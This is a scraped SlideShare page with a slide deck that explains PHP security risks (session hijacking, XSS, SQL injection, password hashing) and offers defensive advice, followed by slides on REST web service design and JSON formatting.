PHP  SecurityPresented by :
Index• Introduction• PHP & Security• Session Hijacking• Types Of Session    Hijacking• Protection Against    Session    Hi...
Index• SQL Injection• How SQL Injection   Works• Goals Of SQL   Injection• XSS•
Introduction• Security is a     measurement,     not a     characteristic.• It’s is also an     growing problem     that r...
PHP & Security• PHP keeps on   growing as a   language,   making headway   into enterprise   and corporate   markets.••• C...
Session Hijacking• TCP session   hijacking is when   a hacker takes   over a TCP   session between   two machines.• Since ...
Types of Session Hijacking
Protection Against Session                         Hijacking•   Use encryption•   Use a secure       protocol•   Limit inc...
Input Validation• One of the key   concepts you   must accept is   that user input is   unreliable and   not to be trusted...
Strong Password• Do not store   password as   plain text• Do not try to invent   your own   password   security• Do not en...
Strong Password• Do not use MD5 –   though this   cryptographic   hashing function   is irreversible , it   is quite easy ...
XSS• Cross Site   Scripting (XSS)   is a situation   where by   attacker injects   HTML code,   which is then   displayed ...
XSS Condition1. A Web  application  accepts user  input   – Well, which      Web      application      doesnt?   –2. The i...
Who is Affected By XSS• XSS attack’s first   target is the   Client     – Client trusts        server (Does        not exp...
Impact Of XSS - Attack  Access to authentication    credentials for Web    application• Cookies, Username and    Password ...
Impact Of XSS - Attack• Denial-of-Service     – Crash        Users`Browse        r, Pop-Up-        Flodding,        Redire...
Preventing XSSPreventing XSS Means Preventing….• Subversion of   separation of   clients     – Attacker can         access...
XSS Solution• Implement    XSS-    Prevention in    application• Do not assume   input values   are benign• Do not trust  ...
What to consider as an “INPUT”• Not only field   values with user   supplied input• Should be treated   as Input:    – All...
How To Perform Input Validation• Check if the input    is what you    expect           • Do not try              to check ...
SQL Injection• SQL injection is   similar to XSS, in   the fact that not   validated data is   being used. But   in this c...
SQL Injection• SQL injection    vulnerabilities    come in two    main forms.• Both forms involve    injecting SQL    code...
Goals Of SQL Injection• Your goal as an   injector is to   outsmart the   SQL server.• SQL server is   normally running   ...
Goals Of SQL Injection• attacker might use    xp_regXXX    these functions    to read the SAM,    change the    configurat...
How SQL Injection Works• Before you protect    from an injection,    you must first    understand how    SQL works.• the u...
Escape SQL• If database     interface     extension offers     dedicated     escaping     functions, USE     THEM!     – M...
Questions?
Thank You
REST Web services●   Representational State Transfer defines a set of    architectural principles by which we can design W...
Design    REST Web service follows four basic design    principles:●   Use HTTP methods explicitly.●   Be stateless.●   Ex...
Use HTTP methods explicitly●   REST asks developers to use HTTP methods    explicitly and in a way thats consistent with t...
Use HTTP methods explicitly (cont.)    According to this mapping:●   To create a resource on the server, use POST.●   To r...
Be stateless●   The client–server communication is further    constrained by no client context being stored on    the serv...
Expose directory structure-like                                    URIs    Some guidelines about URI structure for a RESTf...
Transfer XML, JSON, or both●   The last set of constraints that goes into a RESTful    Web service design has to do with t...
XML Representation●   <SoftwareInstance>●        <SoftwareInstanceId>200003</SoftwareInstanceId>●        <HostName>AB12345...
JSON Representation●   {●       "softwareinstanceid":200003,●       "componentname":"IBM License Metric Tool",●       "ser...
JSON●   JSON (Javascript Object Notation) is a lightweight    computer data interchange format.●    It is a text-based, hu...
JSON ArchitectureJSON is built on two structures:●   A collection of name/value pairs. In various    languages, this is re...
JSON Functions    JSON Functions used in PHP●   json_decode — Decodes a JSON string●   json_encode — Returns the JSON    r...
JSON Format●   {●       "softwareinstanceid":200003,●       "componentname":"IBM License Metric Tool",●       "servername"...
a
a
a
a
Upcoming SlideShare
Loading in …5
×

a

143 views

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
143
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
1
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide
  • SEO
  • SEO
  • SEO
  • SEO
  • a

    1. 1. PHP SecurityPresented by :
    2. 2. Index• Introduction• PHP & Security• Session Hijacking• Types Of Session Hijacking• Protection Against Session Hijacking• Preventing XSS
    3. 3. Index• SQL Injection• How SQL Injection Works• Goals Of SQL Injection• XSS•
    4. 4. Introduction• Security is a measurement, not a characteristic.• It’s is also an growing problem that requires an continually evolving solution. ØA good measure of
    5. 5. PHP & Security• PHP keeps on growing as a language, making headway into enterprise and corporate markets.••• Consequently PHP applications
    6. 6. Session Hijacking• TCP session hijacking is when a hacker takes over a TCP session between two machines.• Since most authentication only occurs at the start of a TCP session, this allows the
    7. 7. Types of Session Hijacking
    8. 8. Protection Against Session Hijacking• Use encryption• Use a secure protocol• Limit incoming connections• Minimize remote access•
    9. 9. Input Validation• One of the key concepts you must accept is that user input is unreliable and not to be trusted. – Partially lost in transmission between server & client. – Corrupted by some in- between process.
    10. 10. Strong Password• Do not store password as plain text• Do not try to invent your own password security• Do not encrypt passwords as they are reversible. Security through
    11. 11. Strong Password• Do not use MD5 – though this cryptographic hashing function is irreversible , it is quite easy to make a list of millions of hashed passwords (a rainbow table) and compare the
    12. 12. XSS• Cross Site Scripting (XSS) is a situation where by attacker injects HTML code, which is then displayed on the page without further validation.
    13. 13. XSS Condition1. A Web application accepts user input – Well, which Web application doesnt? –2. The input is used to create dynamic content
    14. 14. Who is Affected By XSS• XSS attack’s first target is the Client – Client trusts server (Does not expect attack) – Browser executes malicious script•
    15. 15. Impact Of XSS - Attack Access to authentication credentials for Web application• Cookies, Username and Password Ø XSS is not a harmless flaw !• Normal users Ø Access to personal data (Credit card, Bank Account) Ø Access to business data (Bid details, construction details) Ø Misuse account (order expensive goods)
    16. 16. Impact Of XSS - Attack• Denial-of-Service – Crash Users`Browse r, Pop-Up- Flodding, Redirection• Access to Users` machine – Use ActiveX objects to control machine
    17. 17. Preventing XSSPreventing XSS Means Preventing….• Subversion of separation of clients – Attacker can access affected clients’ data – Industrial espionage• Identity theft – Attacker can impersonate
    18. 18. XSS Solution• Implement XSS- Prevention in application• Do not assume input values are benign• Do not trust client side validation• Check and validate all
    19. 19. What to consider as an “INPUT”• Not only field values with user supplied input• Should be treated as Input: – All field values: Even hidden fields – All HTTP header fields: Referer – And even the
    20. 20. How To Perform Input Validation• Check if the input is what you expect • Do not try to check for "bad input"• Black list testing is no solution
    21. 21. SQL Injection• SQL injection is similar to XSS, in the fact that not validated data is being used. But in this case this data is passed to the database. – Arbitrary query execution • Removal of data.
    22. 22. SQL Injection• SQL injection vulnerabilities come in two main forms.• Both forms involve injecting SQL code into a website.• (1) Injecting into a form. Such as username and password boxes
    23. 23. Goals Of SQL Injection• Your goal as an injector is to outsmart the SQL server.• SQL server is normally running as either the local system account, or a domain user account, an
    24. 24. Goals Of SQL Injection• attacker might use xp_regXXX these functions to read the SAM, change the configuration of a system service etc
    25. 25. How SQL Injection Works• Before you protect from an injection, you must first understand how SQL works.• the username and password you entered is kept in the sites member table• The login form takes the
    26. 26. Escape SQL• If database interface extension offers dedicated escaping functions, USE THEM! – MySQL • mysql_esc ape_stri ng() • mysql_rea l_escape
    27. 27. Questions?
    28. 28. Thank You
    29. 29. REST Web services● Representational State Transfer defines a set of architectural principles by which we can design Web services that focus on a systems resources, including how resource states are addressed and transferred over HTTP by a wide range of clients written in different languages.● REST has emerged in the last few years alone as a predominant Web service design model.● REST has had such a large impact on the Web that it has mostly displaced SOAP- and WSDL- based interface design because its a considerably simpler style to use.
    30. 30. Design REST Web service follows four basic design principles:● Use HTTP methods explicitly.● Be stateless.● Expose directory structure-like URIs.● Transfer XML, JavaScript Object Notation (JSON), or both.
    31. 31. Use HTTP methods explicitly● REST asks developers to use HTTP methods explicitly and in a way thats consistent with the protocol definition.● This basic REST design principle establishes a one-to-one mapping between create, read, update, and delete (CRUD) operations and HTTP methods.
    32. 32. Use HTTP methods explicitly (cont.) According to this mapping:● To create a resource on the server, use POST.● To retrieve a resource, use GET.● To change the state of a resource or to update it, use PUT.● To remove or delete a resource, use DELETE.
    33. 33. Be stateless● The client–server communication is further constrained by no client context being stored on the server between requests. Each request from any client contains all of the information necessary to service the request, and any session state is held in the client.
    34. 34. Expose directory structure-like URIs Some guidelines about URI structure for a RESTful Web service are:● Hide the server-side scripting technology file extensions (.jsp, .php, .asp), if any, so you can port to something else without changing the URIs.● Keep everything lowercase.● Substitute spaces with hyphens or underscores (one or the other).● Avoid query strings as much as you can.● Instead of using the 404 Not Found code if the request URI is for a partial path, always provide a default page or resource as a response.
    35. 35. Transfer XML, JSON, or both● The last set of constraints that goes into a RESTful Web service design has to do with the format of the data that the application and service exchange in the request/response payload or in the HTTP body. This is where it really pays to keep things simple, human- readable, and connected.
    36. 36. XML Representation● <SoftwareInstance>● <SoftwareInstanceId>200003</SoftwareInstanceId>● <HostName>AB123456</HostName>● <ServerName>LENOVO THINKPAD T410 XYZ123</ServerName>● <ComponentId>45446</ComponentId>● <ComponentName>IBM License Metric Tool </ComponentName>● <ComponentVersion>7.5</ComponentVersion>● </SoftwareInstance>
    37. 37. JSON Representation● {● "softwareinstanceid":200003,● "componentname":"IBM License Metric Tool",● "servername":"LENOVO THINKPAD T410 XYZ123",● "hostname":"AB123456",● "componentid":45446,● "componentversion":"7.5"● }
    38. 38. JSON● JSON (Javascript Object Notation) is a lightweight computer data interchange format.● It is a text-based, human-readable format for representing objects and other data structures and is mainly used to transmit such structured data over a network connection (in a process called serialization).● JSON finds its main application in Ajax web application programming, as a simple alternative to using XML for asynchronously transmitting structured information between client and server.
    39. 39. JSON ArchitectureJSON is built on two structures:● A collection of name/value pairs. In various languages, this is realized as an object, record, struct, dictionary, hash table, keyed list, or associative array.● An ordered list of values. In most languages, this is realized as an array, vector, list, or sequence
    40. 40. JSON Functions JSON Functions used in PHP● json_decode — Decodes a JSON string● json_encode — Returns the JSON representation of a value● json_last_error — Returns the last error occurred
    41. 41. JSON Format● {● "softwareinstanceid":200003,● "componentname":"IBM License Metric Tool",● "servername":"LENOVO THINKPAD T410 XYZ123",● "hostname":"AB123456",● "componentid":45446,● "componentversion":"7.5"● }

    ×